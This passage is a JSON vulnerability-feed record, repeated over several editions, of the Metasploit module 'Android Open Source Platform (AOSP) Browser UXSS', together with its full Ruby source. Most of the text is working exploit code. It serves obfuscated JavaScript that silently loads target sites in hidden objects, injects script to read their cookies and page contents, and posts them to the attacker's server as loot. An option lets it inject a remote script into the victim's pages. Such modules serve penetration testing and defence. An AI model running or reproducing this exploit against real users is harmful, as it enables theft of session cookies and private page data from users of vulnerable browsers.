document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-19T15:26:34", "differentElements": ["modified", "published"], "edition": 57}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-09T17:46:48", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-09T17:46:48", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-09T19:47:12", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-09T19:47:12", "differentElements": ["modified", "published"], "edition": 59}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "6e872c0bb2ab042e21a220e7df9966e5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-24T21:27:18", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-24T21:27:18", "differentElements": ["modified", "published"], "edition": 60}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-24T23:27:42", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310704388", "OPENVAS:1361412562310704387", "OPENVAS:1361412562310843904", "OPENVAS:1361412562310814670", "OPENVAS:1361412562310843903", "OPENVAS:1361412562310875445", "OPENVAS:1361412562310843901"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2D06CECA2192DFF0EED67EAC5413CB11"]}, {"type": "securelist", "idList": ["SECURELIST:067DB0A9978063CEC1E7506882CBB27E"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/CISCO_RV320_CONFIG"]}], "modified": "2018-09-24T23:27:42"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-09-24T23:27:42", "differentElements": ["modified", "published"], "edition": 61}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "6e872c0bb2ab042e21a220e7df9966e5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-12T08:43:30", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310704388", "OPENVAS:1361412562310704387", "OPENVAS:1361412562310843904", "OPENVAS:1361412562310843903", "OPENVAS:1361412562310875445", "OPENVAS:1361412562310814670", "OPENVAS:1361412562310843901"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2D06CECA2192DFF0EED67EAC5413CB11"]}, {"type": "securelist", "idList": ["SECURELIST:067DB0A9978063CEC1E7506882CBB27E"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/CISCO_RV320_CONFIG"]}], "modified": "2019-02-12T08:43:30"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-12T08:43:30", "differentElements": ["modified", "published"], "edition": 62}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": 